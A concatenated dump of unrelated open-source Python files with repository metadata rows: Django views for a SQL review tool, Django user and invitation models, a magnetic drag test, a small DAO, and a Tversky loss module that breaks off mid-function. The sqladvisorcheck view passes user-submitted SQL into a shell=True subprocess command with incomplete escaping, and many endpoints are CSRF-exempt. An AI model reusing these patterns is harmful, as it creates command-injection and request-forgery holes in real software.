Q(engineer__contains=search) | Q(workflow_name__contains=search)).count()
else:
listWorkflow = workflow.objects.filter(
Q(engineer=loginUser) | Q(review_man__contains=loginUser)
).filter(
Q(engineer__contains=search) | Q(workflow_name__contains=search)
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
"is_backup", "create_time", "cluster_name", "db_name",
"group_name")
listWorkflowCount = workflow.objects.filter(
Q(engineer=loginUser) | Q(review_man__contains=loginUser)).filter(
Q(engineer__contains=search) | Q(workflow_name__contains=search)
).count()
elif navStatus in Const.workflowStatus.keys():
if loginUserOb.is_superuser == 1 or loginUserOb.role == "DBA":
listWorkflow = workflow.objects.filter(
status=Const.workflowStatus[navStatus]
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
"is_backup", "create_time", "cluster_name", "db_name",
"group_name")
listWorkflowCount = workflow.objects.filter(status=Const.workflowStatus[navStatus]).count()
else:
listWorkflow = workflow.objects.filter(
status=Const.workflowStatus[navStatus]
).filter(
Q(engineer=loginUser) | Q(review_man__contains=loginUser)
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer", "status",
"is_backup", "create_time", "cluster_name", "db_name",
"group_name")
listWorkflowCount = workflow.objects.filter(
status=Const.workflowStatus[navStatus]
).filter(
Q(engineer=loginUser) | Q(review_man__contains=loginUser)).count()
else:
context = {'errMsg': '传入的navStatus参数有误!'}
return render(request, 'error.html', context)
# QuerySet 序列化
rows = [row for row in listWorkflow]
result = {"total": listWorkflowCount, "rows": rows}
# 返回查询结果
return HttpResponse(json.dumps(result, cls=ExtendJSONEncoder, bigint_as_string=True), content_type='application/json')
# 提交SQL给inception进行自动审核
@csrf_exempt
def simplecheck(request):
sqlContent = request.POST.get('sql_content')
clusterName = request.POST.get('cluster_name')
db_name = request.POST.get('db_name')
finalResult = {'status': 0, 'msg': 'ok', 'data': {}}
# 服务器端参数验证
if sqlContent is None or clusterName is None or db_name is None:
finalResult['status'] = 1
finalResult['msg'] = '页面提交参数可能为空'
return HttpResponse(json.dumps(finalResult), content_type='application/json')
# 删除注释语句
sqlContent = ''.join(
map(lambda x: re.compile(r'(^--.*|^/\*.*\*/;[\f\n\r\t\v\s]*$)').sub('', x, count=1),
sqlContent.splitlines(1))).strip()
# 去除空行
sqlContent = re.sub('[\r\n\f]{2,}', '\n', sqlContent)
if sqlContent[-1] != ";":
finalResult['status'] = 1
finalResult['msg'] = 'SQL语句结尾没有以;结尾,请重新修改并提交!'
return HttpResponse(json.dumps(finalResult), content_type='application/json')
# 获取用户信息
loginUser = request.session.get('login_username', False)
loginUserOb = users.objects.get(username=loginUser)
# 交给inception进行自动审核
pv = PermissionVerification(loginUser, loginUserOb)
# priv_rows_info, reviewResult = pv.check_resource_priv(sqlContent, clusterName, db_name, 1)
# 检测用户资源权限
if loginUserOb.is_superuser:
reviewResult = pv.check_resource_priv(sqlContent, clusterName, db_name, 1)
else:
reviewResult = pv.check_resource_priv(sqlContent, clusterName, db_name, 0)
result = reviewResult["data"]
if reviewResult["status"] == 1:
finalResult['status'] = 1
finalResult['msg'] = reviewResult["msg"]
return HttpResponse(json.dumps(finalResult), content_type='application/json')
if result is None or len(result) == 0:
finalResult['status'] = 1
finalResult['msg'] = 'inception返回的结果集为空!可能是SQL语句有语法错误'
return HttpResponse(json.dumps(finalResult), content_type='application/json')
# 要把result转成JSON存进数据库里,方便SQL单子详细信息展示
column_list = ['ID', 'stage', 'errlevel', 'stagestatus', 'errormessage', 'SQL', 'Affected_rows', 'sequence',
'backup_dbname', 'execute_time', 'sqlsha1']
rows = []
CheckWarningCount = 0
CheckErrorCount = 0
for row_item in result:
row = {}
row['errlevel'] = row_item[2]
row['errormessage'] = row_item[4]
if row['errlevel'] == 1:
CheckWarningCount = CheckWarningCount + 1
elif row['errlevel'] == 2:
CheckErrorCount = CheckErrorCount + 1
row['ID'] = row_item[0]
row['stage'] = row_item[1]
row['stagestatus'] = row_item[3]
row['SQL'] = row_item[5]
row['Affected_rows'] = row_item[6]
row['sequence'] = row_item[7]
row['backup_dbname'] = row_item[8]
row['execute_time'] = row_item[9]
# row['sqlsha1'] = row_item[10]
rows.append(row)
finalResult['data']['rows'] = rows
finalResult['data']['column_list'] = column_list
finalResult['data']['CheckWarningCount'] = CheckWarningCount
finalResult['data']['CheckErrorCount'] = CheckErrorCount
return HttpResponse(json.dumps(finalResult), content_type='application/json')
# 请求图表数据
@csrf_exempt
def getMonthCharts(request):
result = dao.getWorkChartsByMonth()
return HttpResponse(json.dumps(result), content_type='application/json')
@csrf_exempt
def getPersonCharts(request):
result = dao.getWorkChartsByPerson()
return HttpResponse(json.dumps(result), content_type='application/json')
def getSqlSHA1(workflowId):
"""调用django ORM从数据库里查出review_content,从其中获取sqlSHA1值"""
workflowDetail = get_object_or_404(workflow, pk=workflowId)
dictSHA1 = {}
# 使用json.loads方法,把review_content从str转成list,
listReCheckResult = json.loads(workflowDetail.review_content)
for rownum in range(len(listReCheckResult)):
id = rownum + 1
sqlSHA1 = listReCheckResult[rownum][10]
if sqlSHA1 != '':
dictSHA1[id] = sqlSHA1
if dictSHA1 != {}:
# 如果找到有sqlSHA1值,说明是通过pt-OSC操作的,将其放入缓存。
# 因为使用OSC执行的SQL占较少数,所以不设置缓存过期时间
sqlSHA1_cache[workflowId] = dictSHA1
return dictSHA1
@csrf_exempt
def getOscPercent(request):
"""获取该SQL的pt-OSC执行进度和剩余时间"""
workflowId = request.POST['workflowid']
sqlID = request.POST['sqlID']
if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
workflowId = int(workflowId)
sqlID = int(sqlID)
dictSHA1 = {}
if workflowId in sqlSHA1_cache:
dictSHA1 = sqlSHA1_cache[workflowId]
# cachehit = "已命中"
else:
dictSHA1 = getSqlSHA1(workflowId)
if dictSHA1 != {} and sqlID in dictSHA1:
sqlSHA1 = dictSHA1[sqlID]
try:
result = inceptionDao.getOscPercent(sqlSHA1) # 成功获取到SHA1值,去inception里面查询进度
except Exception as msg:
result = {'status': 1, 'msg': msg, 'data': ''}
return HttpResponse(json.dumps(result), content_type='application/json')
if result["status"] == 0:
# 获取到进度值
pctResult = result
else:
# result["status"] == 1, 未获取到进度值,需要与workflow.execute_result对比,来判断是已经执行过了,还是还未执行
execute_result = workflow.objects.get(id=workflowId).execute_result
try:
listExecResult = json.loads(execute_result)
except ValueError:
listExecResult = execute_result
if type(listExecResult) == list and len(listExecResult) >= sqlID - 1:
if dictSHA1[sqlID] in listExecResult[sqlID - 1][10]:
# 已经执行完毕,进度值置为100
pctResult = {"status": 0, "msg": "ok", "data": {"percent": 100, "timeRemained": ""}}
else:
# 可能因为前一条SQL是DML,正在执行中;或者还没执行到这一行。但是status返回的是4,而当前SQL实际上还未开始执行。这里建议前端进行重试
pctResult = {"status": -3, "msg": "进度未知", "data": {"percent": -100, "timeRemained": ""}}
elif dictSHA1 != {} and sqlID not in dictSHA1:
pctResult = {"status": 4, "msg": "该行SQL不是由pt-OSC执行的", "data": ""}
else:
pctResult = {"status": -2, "msg": "整个工单不由pt-OSC执行", "data": ""}
return HttpResponse(json.dumps(pctResult), content_type='application/json')
@csrf_exempt
def getWorkflowStatus(request):
"""获取某个工单的当前状态"""
workflowId = request.POST['workflowid']
if workflowId == '' or workflowId is None:
context = {"status": -1, 'msg': 'workflowId参数为空.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
workflowId = int(workflowId)
workflowDetail = get_object_or_404(workflow, pk=workflowId)
workflowStatus = workflowDetail.status
result = {"status": workflowStatus, "msg": "", "data": ""}
return HttpResponse(json.dumps(result), content_type='application/json')
@csrf_exempt
def stopOscProgress(request):
"""中止该SQL的pt-OSC进程"""
workflowId = request.POST['workflowid']
sqlID = request.POST['sqlID']
if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
loginUser = request.session.get('login_username', False)
workflowDetail = workflow.objects.get(id=workflowId)
try:
reviewMan = json.loads(workflowDetail.review_man)
except ValueError:
reviewMan = (workflowDetail.review_man,)
# 服务器端二次验证,当前工单状态必须为等待人工审核,正在执行人工审核动作的当前登录用户必须为审核人. 避免攻击或被接口测试工具强行绕过
if workflowDetail.status != Const.workflowStatus['executing']:
context = {"status": -1, "msg": '当前工单状态不是"执行中",请刷新当前页面!', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
if loginUser is None or loginUser not in reviewMan:
context = {"status": -1, 'msg': '当前登录用户不是审核人,请重新登录.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
workflowId = int(workflowId)
sqlID = int(sqlID)
if workflowId in sqlSHA1_cache:
dictSHA1 = sqlSHA1_cache[workflowId]
else:
dictSHA1 = getSqlSHA1(workflowId)
if dictSHA1 != {} and sqlID in dictSHA1:
sqlSHA1 = dictSHA1[sqlID]
try:
optResult = inceptionDao.stopOscProgress(sqlSHA1)
except Exception as msg:
result = {'status': 1, 'msg': msg, 'data': ''}
return HttpResponse(json.dumps(result), content_type='application/json')
else:
optResult = {"status": 4, "msg": "不是由pt-OSC执行的", "data": ""}
return HttpResponse(json.dumps(optResult), content_type='application/json')
# 获取SQLAdvisor的优化结果
@csrf_exempt
def sqladvisorcheck(request):
sqlContent = request.POST.get('sql_content')
clusterName = request.POST.get('cluster_name')
dbName = request.POST.get('db_name')
verbose = request.POST.get('verbose')
finalResult = {'status': 0, 'msg': 'ok', 'data': []}
# 服务器端参数验证
if sqlContent is None or clusterName is None:
finalResult['status'] = 1
finalResult['msg'] = '页面提交参数可能为空'
return HttpResponse(json.dumps(finalResult), content_type='application/json')
sqlContent = sqlContent.strip()
if sqlContent[-1] != ";":
finalResult['status'] = 1
finalResult['msg'] = 'SQL语句结尾没有以;结尾,请重新修改并提交!'
return HttpResponse(json.dumps(finalResult), content_type='application/json')
if verbose is None or verbose == '':
verbose = 1
# 取出主库的连接信息
cluster_info = master_config.objects.get(cluster_name=clusterName)
# 提交给sqladvisor获取审核结果
sqladvisor_path = getattr(settings, 'SQLADVISOR')
sqlContent = sqlContent.strip().replace('"', '\\"').replace('`', '\`').replace('\n', ' ')
try:
p = subprocess.Popen(sqladvisor_path + ' -h "%s" -P "%s" -u "%s" -p "%s\" -d "%s" -v %s -q "%s"' % (
str(cluster_info.master_host), str(cluster_info.master_port), str(cluster_info.master_user),
str(prpCryptor.decrypt(cluster_info.master_password), ), str(dbName), verbose, sqlContent),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, universal_newlines=True)
stdout, stderr = p.communicate()
finalResult['data'] = stdout
except Exception:
finalResult['data'] = 'sqladvisor运行报错,请联系管理员'
return HttpResponse(json.dumps(finalResult), content_type='application/json')
# 获取审核列表
@csrf_exempt
def workflowlist(request):
# 获取用户信息
loginUser = request.session.get('login_username', False)
loginUserOb = users.objects.get(username=loginUser)
limit = int(request.POST.get('limit'))
offset = int(request.POST.get('offset'))
workflow_type = int(request.POST.get('workflow_type'))
limit = offset + limit
# 获取搜索参数
search = request.POST.get('search')
if search is None:
search = ''
# 调用工作流接口获取审核列表
result = workflowOb.auditlist(loginUserOb, workflow_type, offset, limit, search)
auditlist = result['data']['auditlist']
auditlistCount = result['data']['auditlistCount']
# QuerySet 序列化
rows = [row for row in auditlist]
result = {"total": auditlistCount, "rows": rows}
# 返回查询结果
return HttpResponse(json.dumps(result, cls=ExtendJSONEncoder, bigint_as_string=True), content_type='application/json')
# 添加项目组
@csrf_exempt
@superuser_required
def addgroup(request):
group_parent_id = int(request.POST.get('group_parent_id'))
group_name = request.POST.get('group_name')
result = {'status': 0, 'msg': 'ok', 'data': []}
inset = Group()
inset.group_parent_id = group_parent_id
inset.group_name = group_name
if group_parent_id != 0:
inset.group_level = Group.objects.get(group_id=group_parent_id).group_level + 1
else:
inset.group_level = 1
inset.save()
return HttpResponse(json.dumps(result), content_type='application/json')
# 获取项目组的审核人
@csrf_exempt
def groupauditors(request):
group_id = request.POST.get('group_id')
group_name = request.POST.get('group_name')
workflow_type = request.POST['workflow_type']
result = {'status': 0, 'msg': 'ok', 'data': []}
if group_id:
auditors = workflowOb.auditsettings(group_id=int(group_id), workflow_type=workflow_type)
elif group_name:
group_id = Group.objects.get(group_name=group_name).group_id
auditors = workflowOb.auditsettings(group_id=group_id, workflow_type=workflow_type)
else:
result['status'] = 1
result['msg'] = '参数错误'
return HttpResponse(json.dumps(result), content_type='application/json')
# 获取所有用户
if auditors:
auditor_list = auditors.audit_users.split(',')
result['data'] = auditor_list
else:
result['data'] = []
return HttpResponse(json.dumps(result), content_type='application/json')
# 项目组审核配置
@csrf_exempt
@superuser_required
def changegroupauditors(request):
audit_users = request.POST.get('audit_users')
group_id = int(request.POST.get('group_id'))
workflow_type = request.POST.get('workflow_type')
result = {'status': 0, 'msg': 'ok', 'data': []}
# 调用工作流修改审核配置
try:
workflowOb.changesettings(group_id, workflow_type, audit_users)
except Exception as msg:
result['msg'] = str(msg)
result['status'] = 1
# 返回结果
return HttpResponse(json.dumps(result), content_type='application/json')
| 39.225859 | 122 | 0.641841 | 0 | 0 | 0 | 0 | 23,228 | 0.883227 | 0 | 0 | 7,723 | 0.293661 |
17f3d9a2300741cd7506a6c4460578d98121f0a5 | 154 | py | Python | gather/handlers/__init__.py | openghg/gather | 0096cfe66b0093cdd294fa2a67c060d7fc28d2fa | [
"Apache-2.0"
] | null | null | null | gather/handlers/__init__.py | openghg/gather | 0096cfe66b0093cdd294fa2a67c060d7fc28d2fa | [
"Apache-2.0"
] | null | null | null | gather/handlers/__init__.py | openghg/gather | 0096cfe66b0093cdd294fa2a67c060d7fc28d2fa | [
"Apache-2.0"
] | null | null | null | from ._scrape import scrape_handler
from ._binary_data import data_handler
from ._crds import crds_handler
__all__ = ["scrape_handler", "data_handler"]
| 22 | 44 | 0.811688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.194805 |
17f4968f43abac4e2306cd72253ba000d15a0329 | 49 | py | Python | bitswap/block_storage/__init__.py | VladislavSufyanov/py-bitswap | 875d15944e485c33b16af9965f24c1d85cb34c55 | [
"MIT"
] | null | null | null | bitswap/block_storage/__init__.py | VladislavSufyanov/py-bitswap | 875d15944e485c33b16af9965f24c1d85cb34c55 | [
"MIT"
] | null | null | null | bitswap/block_storage/__init__.py | VladislavSufyanov/py-bitswap | 875d15944e485c33b16af9965f24c1d85cb34c55 | [
"MIT"
] | null | null | null | from .base_block_storage import BaseBlockStorage
| 24.5 | 48 | 0.897959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17f57d12f28aa74c2e00b10a8b41523a0b884875 | 12,816 | py | Python | src/users/models.py | ofirr/OpenCommunity | 7786ac2996530af8f545f4398c071793c73634c8 | [
"BSD-3-Clause"
] | null | null | null | src/users/models.py | ofirr/OpenCommunity | 7786ac2996530af8f545f4398c071793c73634c8 | [
"BSD-3-Clause"
] | null | null | null | src/users/models.py | ofirr/OpenCommunity | 7786ac2996530af8f545f4398c071793c73634c8 | [
"BSD-3-Clause"
] | null | null | null | from django.conf import settings
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser, \
PermissionsMixin
from django.core.mail import send_mail
from django.db import models
from django.template.loader import render_to_string
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from issues.models import Proposal, ProposalVote, ProposalVoteValue, \
ProposalStatus
from meetings.models import MeetingParticipant
from users.default_roles import DefaultGroups
import datetime
import logging
import random
import string
CODE_LENGTH = 48
logger = logging.getLogger(__name__)
class OCUserManager(BaseUserManager):
@classmethod
def normalize_email(cls, email):
return email.lower()
def get_by_natural_key(self, username):
return self.get(email__iexact=username)
def create_user(self, email, display_name=None, password=None, **kwargs):
"""
Creates and saves a User with the given email, display name and
password.
"""
if not email:
raise ValueError('Users must have an email address')
if not display_name:
display_name = email
user = self.model(
email=OCUserManager.normalize_email(email),
display_name=display_name,
**kwargs
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, display_name, password):
"""
Creates and saves a superuser with the given email, display name and
password.
"""
user = self.create_user(email,
password=password,
display_name=display_name
)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class OCUser(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(_('email address'), max_length=255, unique=True,
db_index=True,
)
display_name = models.CharField(_("Your name"), max_length=200)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(_('staff status'), default=False,
help_text=_('Designates whether the user can log into this admin '
'site.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
objects = OCUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['display_name']
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
def __unicode__(self):
return self.display_name
def get_full_name(self):
# The user is identified by their email address
return self.display_name
def get_short_name(self):
# The user is identified by their email address
return self.display_name
def get_default_group(self, community):
try:
return self.memberships.get(community=community).default_group_name
except Membership.DoesNotExist:
return ""
def email_user(self, subject, message, from_email=None):
"""
Sends an email to this User.
"""
send_mail(subject, message, from_email, [self.email])
class MembershipManager(models.Manager):
def board(self):
return self.get_query_set().exclude(
default_group_name=DefaultGroups.MEMBER)
def none_board(self):
return self.get_query_set().filter(
default_group_name=DefaultGroups.MEMBER)
class Membership(models.Model):
community = models.ForeignKey('communities.Community', verbose_name=_("Community"),
related_name='memberships')
user = models.ForeignKey(OCUser, verbose_name=_("User"),
related_name='memberships')
default_group_name = models.CharField(_('Group'), max_length=50,
choices=DefaultGroups.CHOICES)
created_at = models.DateTimeField(auto_now_add=True,
verbose_name=_("Created at"))
invited_by = models.ForeignKey(settings.AUTH_USER_MODEL,
verbose_name=_("Invited by"),
related_name="members_invited", null=True,
blank=True)
in_position_since = models.DateField(default=datetime.date.today(),
verbose_name=_("In position since"))
objects = MembershipManager()
class Meta:
unique_together = (("community", "user"),)
verbose_name = _("Community Member")
verbose_name_plural = _("Community Members")
def __unicode__(self):
return "%s: %s (%s)" % (self.community.name, self.user.display_name,
self.get_default_group_name_display())
@models.permalink
def get_absolute_url(self):
return "member_profile", (self.community.id, self.id)
def get_permissions(self):
return DefaultGroups.permissions[self.default_group_name]
def total_meetings(self):
""" In the future we'll check since joined to community or rejoined """
return self.community.meetings.filter(held_at__gte=self.in_position_since).count()
def meetings_participation(self):
""" In the future we'll check since joined to community or rejoined """
return MeetingParticipant.objects.filter(user=self.user, is_absent=False,
meeting__community=self.community,
meeting__held_at__gte=self.in_position_since).count()
def meetings_participation_percantage(self):
""" In the future we'll check since joined to community or rejoined """
return round((float(self.meetings_participation()) / float(self.total_meetings())) * 100.0)
def member_open_tasks(self, user=None, community=None):
return Proposal.objects.object_access_control(
user=user, community=community).filter(status=ProposalStatus.ACCEPTED, assigned_to_user=self.user, active=True, task_completed=False).exclude(due_by__lte=datetime.date.today())
def member_close_tasks(self, user=None, community=None):
""" Need to create a field to determine closed tasks """
return Proposal.objects.object_access_control(
user=user, community=community).filter(status=ProposalStatus.ACCEPTED, assigned_to_user=self.user, active=True, task_completed=True)
def member_late_tasks(self, user=None, community=None):
return Proposal.objects.object_access_control(
user=user, community=community).filter(status=ProposalStatus.ACCEPTED, assigned_to_user=self.user, due_by__lte=datetime.date.today(), active=True, task_completed=False)
def member_votes_dict(self):
res = {'pro': {}, 'neut': {}, 'con': {}}
pro_count = 0
con_count = 0
neut_count = 0
votes = self.user.board_votes.select_related('proposal') \
.filter(proposal__issue__community_id=self.community_id,
proposal__register_board_votes=True,
proposal__active=True,
proposal__decided_at_meeting__held_at__gte=self.in_position_since) \
.exclude(proposal__status=ProposalStatus.IN_DISCUSSION).order_by('-proposal__issue__created_at', 'proposal__id')
for v in votes:
if not v.proposal.register_board_votes:
continue
if v.value == ProposalVoteValue.NEUTRAL:
key = 'neut'
neut_count += 1
elif v.value == ProposalVoteValue.PRO:
key = 'pro'
pro_count += 1
elif v.value == ProposalVoteValue.CON:
key = 'con'
con_count += 1
issue_key = v.proposal.issue
p_list = res[key].setdefault(issue_key, [])
p_list.append(v.proposal)
res['pro_count'] = pro_count
res['con_count'] = con_count
res['neut_count'] = neut_count
return res
def _user_board_votes(self):
return self.user.board_votes.select_related('proposal').filter(proposal__issue__community_id=self.community_id,
proposal__active=True,
proposal__register_board_votes=True,
proposal__decided_at_meeting__held_at__gte=self.in_position_since)
def member_proposal_pro_votes_accepted(self):
return self._user_board_votes().filter(value=ProposalVoteValue.PRO,
proposal__status=ProposalStatus.ACCEPTED)
def member_proposal_con_votes_rejected(self):
return self._user_board_votes().filter(value=ProposalVoteValue.CON,
proposal__status=ProposalStatus.REJECTED)
def member_proposal_nut_votes_accepted(self):
return self._user_board_votes().filter(value=ProposalVoteValue.NEUTRAL,
proposal__status=ProposalStatus.ACCEPTED)
CODE_CHARS = string.lowercase + string.digits
def create_code(length=CODE_LENGTH):
"""
Creates a random code of lowercase letters and numbers
"""
return "".join(random.choice(CODE_CHARS) for _x in xrange(length))
class EmailStatus(object):
PENDING = 0
SENT = 1
FAILED = 2
choices = (
(PENDING, _('Pending')),
(SENT, _('Sent')),
(FAILED, _('Failed')),
)
class Invitation(models.Model):
community = models.ForeignKey('communities.Community',
verbose_name=_("Community"),
related_name='invitations')
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_("Created at"))
created_by = models.ForeignKey(settings.AUTH_USER_MODEL,
verbose_name=_("Created by"),
related_name="invitations_created")
name = models.CharField(_("Name"), max_length=200, null=True, blank=True)
email = models.EmailField(_("Email"))
message = models.TextField(_("Message"), null=True, blank=True)
code = models.CharField(max_length=CODE_LENGTH, default=create_code)
user = models.ForeignKey(OCUser, verbose_name=_("User"),
related_name='invitations', null=True, blank=True)
default_group_name = models.CharField(_('Group'), max_length=50,
choices=DefaultGroups.CHOICES)
status = models.PositiveIntegerField(_("Status"),
choices=EmailStatus.choices, default=EmailStatus.PENDING)
times_sent = models.PositiveIntegerField(_("Times Sent"), default=0)
error_count = models.PositiveIntegerField(_("Error count"), default=0)
last_sent_at = models.DateTimeField(_("Sent at"), null=True, blank=True)
class Meta:
unique_together = (("community", "email"),)
verbose_name = _("Invitation")
verbose_name_plural = _("Invitations")
DEFAULT_MESSAGE = _("The system will allow you to take part in the decision making process of %s. "
"Once you've joined, you'll be able to see the topics for the agenda in the upcoming meeting, decisions at previous meetings, and in the near future you'll be able to discuss and influence them.")
def __unicode__(self):
return "%s: %s (%s)" % (self.community.name, self.email,
self.get_default_group_name_display())
@models.permalink
def get_absolute_url(self):
return "accept_invitation", (self.code,)
def send(self, sender, recipient_name='', base_url=None):
if not base_url:
base_url = settings.HOST_URL
subject = _("Invitation to %s") % self.community.name
d = {
'base_url': base_url,
'object': self,
'recipient_name': recipient_name,
}
message = render_to_string("emails/invitation.txt", d)
recipient_list = [self.email]
from_email = "%s <%s>" % (self.community.name, settings.FROM_EMAIL)
self.last_sent_at = timezone.now()
try:
send_mail(subject, message, from_email, recipient_list)
self.times_sent += 1
self.status = EmailStatus.SENT
self.save()
return True
except:
logger.error("Invitation email sending failed", exc_info=True)
self.error_count += 1
self.status = EmailStatus.FAILED
self.save()
return False
| 39.073171 | 220 | 0.628277 | 11,928 | 0.930712 | 0 | 0 | 287 | 0.022394 | 0 | 0 | 1,905 | 0.148642 |
17f74407f6071edec00f6d7cb2950f3675cc7079 | 881 | py | Python | src/hyperloop/Python/tests/test_magnetic_drag.py | jcchin/Hyperloop_v2 | 73861d2207af8738425c1d484909ed0433b9653f | [
"Apache-2.0"
] | 1 | 2021-04-29T00:23:03.000Z | 2021-04-29T00:23:03.000Z | src/hyperloop/Python/tests/test_magnetic_drag.py | jcchin/Hyperloop_v2 | 73861d2207af8738425c1d484909ed0433b9653f | [
"Apache-2.0"
] | 9 | 2016-11-23T09:10:34.000Z | 2016-12-06T01:10:09.000Z | src/hyperloop/Python/tests/test_magnetic_drag.py | jcchin/Hyperloop_v2 | 73861d2207af8738425c1d484909ed0433b9653f | [
"Apache-2.0"
] | 11 | 2016-01-19T20:26:35.000Z | 2021-02-13T11:16:20.000Z | """
Test for magnetic_drag.py. Uses test values and outputs given by
the laminated sheet experiment in [1].
"""
import pytest
from hyperloop.Python.pod.magnetic_levitation.magnetic_drag import MagDrag
import numpy as np
from openmdao.api import Group, Problem
def create_problem(magdrag):
root = Group()
prob = Problem(root)
prob.root.add('comp', magdrag)
return prob
class TestVac(object):
def test_case1_vs_breakpoint(self):
magdrag = MagDrag()
prob = create_problem(magdrag)
prob.setup()
prob['comp.vel'] = 23
prob['comp.track_res'] = 0.019269
prob['comp.track_ind'] = 3.59023e-6
prob['comp.pod_weight'] = 29430.0
prob['comp.lam'] = 0.125658
prob.run()
print('magdrag is %f' % prob['comp.mag_drag'])
assert np.isclose(prob['comp.mag_drag'], 137342.0, rtol=.001)
| 25.171429 | 74 | 0.651532 | 493 | 0.559591 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.262202 |
17f88b1dc4e1fbbf2f002412f515f2e67a8d0b31 | 494 | py | Python | back_end/dosage_dao.py | claire-sivan/pharmaceticual_web_based_app | 42c79aa6f95e220d296fb3e97b58edd08a90010e | [
"Apache-2.0"
] | null | null | null | back_end/dosage_dao.py | claire-sivan/pharmaceticual_web_based_app | 42c79aa6f95e220d296fb3e97b58edd08a90010e | [
"Apache-2.0"
] | null | null | null | back_end/dosage_dao.py | claire-sivan/pharmaceticual_web_based_app | 42c79aa6f95e220d296fb3e97b58edd08a90010e | [
"Apache-2.0"
] | null | null | null | def get_dosages(connection):
cursor = connection.cursor()
query = ("SELECT * from dosage")
cursor.execute(query)
response = []
for (dosage_id, dosage_name) in cursor:
response.append({
'dosage_id': dosage_id,
'dosage_name': dosage_name
})
return response
if __name__ == '__main__':
from sql_connection import get_sql_connection
connection = get_sql_connection()
print(get_dosages(connection))
| 23.52381 | 50 | 0.619433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.11336 |
17f8d13aa79ddcb1c6a85761d81131671d95cb65 | 4,681 | py | Python | mmseg/models/losses/tversky_loss.py | yunchu/mmsegmentation | 404f3e0e8859991931b6a39a583de412348e98f0 | [
"Apache-2.0"
] | 3 | 2021-12-21T07:25:13.000Z | 2022-02-07T01:59:19.000Z | mmseg/models/losses/tversky_loss.py | yunchu/mmsegmentation | 404f3e0e8859991931b6a39a583de412348e98f0 | [
"Apache-2.0"
] | 13 | 2021-12-10T15:08:56.000Z | 2022-03-23T08:58:03.000Z | mmseg/models/losses/tversky_loss.py | yunchu/mmsegmentation | 404f3e0e8859991931b6a39a583de412348e98f0 | [
"Apache-2.0"
] | 3 | 2021-11-11T23:16:51.000Z | 2021-12-08T23:49:29.000Z | # Copyright (C) 2018-2021 kornia
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
"""Modified from https://kornia.readthedocs.io/en/v0.1.2/_modules/torchgeometry/losses/tversky.html"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..builder import LOSSES
from .utils import get_class_weight
def tversky_loss(pred,
target,
valid_mask,
alpha,
beta,
eps=1e-6,
class_weight=None,
reduction='mean',
avg_factor=None,
ignore_index=255,
**kwargs):
assert pred.shape[0] == target.shape[0]
num_classes = pred.shape[1]
if num_classes == 1:
class_ids = [0] if ignore_index != 0 else []
elif num_classes == 2:
class_ids = [1] if ignore_index != 1 else []
else:
class_ids = [i for i in range(num_classes) if i != ignore_index]
assert len(class_ids) >= 1
class_losses = []
for i in class_ids:
tversky_loss_value = binary_tversky_loss(
pred[:, i],
target[..., i],
valid_mask=valid_mask,
alpha=alpha,
beta=beta,
eps=eps,
)
if class_weight is not None:
tversky_loss_value *= class_weight[i]
class_losses.append(tversky_loss_value)
if avg_factor is None:
if reduction == 'mean':
loss = sum(class_losses) / float(len(class_losses))
elif reduction == 'sum':
loss = sum(class_losses)
elif reduction == 'none':
loss = class_losses
else:
raise ValueError(f'unknown reduction type: {reduction}')
else:
if reduction == 'mean':
loss = sum(class_losses) / avg_factor
elif reduction != 'none':
raise ValueError('avg_factor can not be used with reduction="sum"')
return loss
def binary_tversky_loss(pred, target, valid_mask, alpha, beta, eps=1e-6):
assert pred.shape[0] == target.shape[0]
pred = pred.reshape(pred.shape[0], -1)
target = target.reshape(target.shape[0], -1)
valid_mask = valid_mask.reshape(valid_mask.shape[0], -1)
valid_pred = torch.mul(pred, valid_mask)
valid_target = torch.mul(target, valid_mask)
intersection = torch.sum(valid_pred * valid_target, dim=1)
fps = torch.sum(valid_pred * (1.0 - valid_target), dim=1)
fns = torch.sum((1.0 - valid_pred) * valid_target, dim=1)
numerator = intersection
denominator = intersection + alpha * fps + beta * fns
return 1.0 - numerator / (denominator + eps)
@LOSSES.register_module()
class TverskyLoss(nn.Module):
"""TverskyLoss.
This loss is proposed in `Tversky loss function for image segmentation
using 3D fully convolutional deep networks <https://arxiv.org/abs/1706.05721>`_.
"""
def __init__(self,
alpha=0.3,
beta=0.7,
eps=1e-6,
reduction='mean',
class_weight=None,
loss_weight=1.0):
super(TverskyLoss, self).__init__()
self.alpha = alpha
self.beta = beta
self.eps = eps
self.reduction = reduction
self.class_weight = get_class_weight(class_weight)
self.loss_weight = loss_weight
@property
def name(self):
return 'tversky'
def forward(self,
pred,
target,
avg_factor=None,
reduction_override=None,
ignore_index=255,
**kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (reduction_override if reduction_override else self.reduction)
if self.class_weight is not None:
class_weight = pred.new_tensor(self.class_weight)
else:
class_weight = None
